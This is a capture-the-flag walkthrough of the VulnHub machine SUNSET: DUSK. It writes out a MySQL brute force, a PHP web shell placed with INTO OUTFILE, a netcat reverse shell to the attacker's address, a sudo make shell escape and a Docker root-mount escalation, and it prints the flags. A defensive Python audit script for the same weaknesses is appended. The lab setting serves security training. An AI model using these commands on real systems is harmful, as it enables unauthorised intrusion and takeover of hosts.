PJzhang: VulnHub target machine, sunset series, SUNSET: DUSK
Morning~~~
Address: https://www.vulnhub.com/entry/sunset-dusk,404/
Focus on the tools and the approach.
nmap 192.168.43.0/24
Target IP
192.168.43.200
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
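nmap -A -p1-65535 192.168.43.200, and check each service's version for known vulnerabilities
Visit http://192.168.43.200:8080/ and http://192.168.43.200/
The brute force below succeeds; the account and password are root/password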
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.43.200 mysql
Log in to the database
mysql -h 192.168.43.200 -u root -P 3306 -p
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/muma.php' ;
muma.php is visible at http://192.168.43.200:8080/; it is located in the directory /var/tmp
http://192.168.43.200:8080/muma.php?cmd=id
http://192.168.43.200:8080/raj.php?cmd=nc%20-e%20/bin/bash%20192.168.43.154%204444
nc -e /bin/bash 192.168.43.154 4444
On the attacking machine: nc -lvnp 4444
Obtain a shell
python -c 'import pty;pty.spawn("/bin/bash")'
sudo -l
(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
Escalate privileges to the dusk user
sudo -u dusk make --eval=$'x:\n\t'/bin/bash
Home directory
cat user.txt
08ebacf8f4e43f05b8b8b372df24235b
docker images
docker pull alpine
docker run -v /:/mnt -it alpine
Root privileges obtained
cd /mnt/root
cat root.txt
8930fa079a510ee880fe047d40dc613e
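
The three weaknesses this walkthrough chains (a shell-capable binary in sudoers, access to the Docker daemon, and unrestricted MySQL INTO OUTFILE) can be audited on a host; the script below is an added example, not part of the original post. The function names, the SHELL_CAPABLE list, the sample inputs and the docker group membership of dusk are assumptions made for the example.

```python
import os
import re

# Binaries that can start arbitrary commands when allowed through sudo.
# Hand-picked for this example, not exhaustive; make is the one used on this page.
SHELL_CAPABLE = {"make", "find", "vim", "less", "awk", "env", "python", "perl", "bash", "sh"}
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo(sudo_l_output):
    """Return sorted (run_as, path) pairs from `sudo -l` output that permit a shell escape."""
    findings = set()
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if not m or "NOEXEC:" in m.group("tags"):
            continue  # not a rule line, or sudo blocks child exec for this rule
        for cmd in m.group("cmds").split(","):
            parts = cmd.split()
            path = parts[0] if parts else ""
            if path == "ALL" or os.path.basename(path) in SHELL_CAPABLE:
                findings.add((m.group("runas"), path))
    return sorted(findings)

def in_docker_group(id_output):
    """True if `id` output lists the docker group (daemon socket access is root-equivalent)."""
    m = re.search(r"groups=(\S+)", id_output)
    return bool(m) and "docker" in re.findall(r"\(([^)]+)\)", m.group(1))

def outfile_unrestricted(secure_file_priv):
    """True if MySQL's secure_file_priv is empty, so INTO OUTFILE may write to any path."""
    return secure_file_priv == ""

# Constructed sample inputs; only the (dusk) rule line is taken from the page.
SUDO_L = """User www-data may run the following commands on dusk:
    (dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
"""
ID_DUSK = "uid=1000(dusk) gid=1000(dusk) groups=1000(dusk),123(docker)"

def audit():
    """Run all three checks on the constructed samples and return the findings."""
    report = [f"sudoers: {path} as {user} gives a shell" for user, path in audit_sudo(SUDO_L)]
    if in_docker_group(ID_DUSK):
        report.append("docker: dusk can mount / into a container, remove it from the group")
    if outfile_unrestricted(""):  # constructed value of SELECT @@secure_file_priv
        report.append("mysql: set secure_file_priv to a dedicated directory or NULL")
    return report

if __name__ == "__main__":
    print("\n".join(audit()))
```

On a real host, feed the functions the output of `sudo -l`, `id` and `SELECT @@secure_file_priv` instead of the samples.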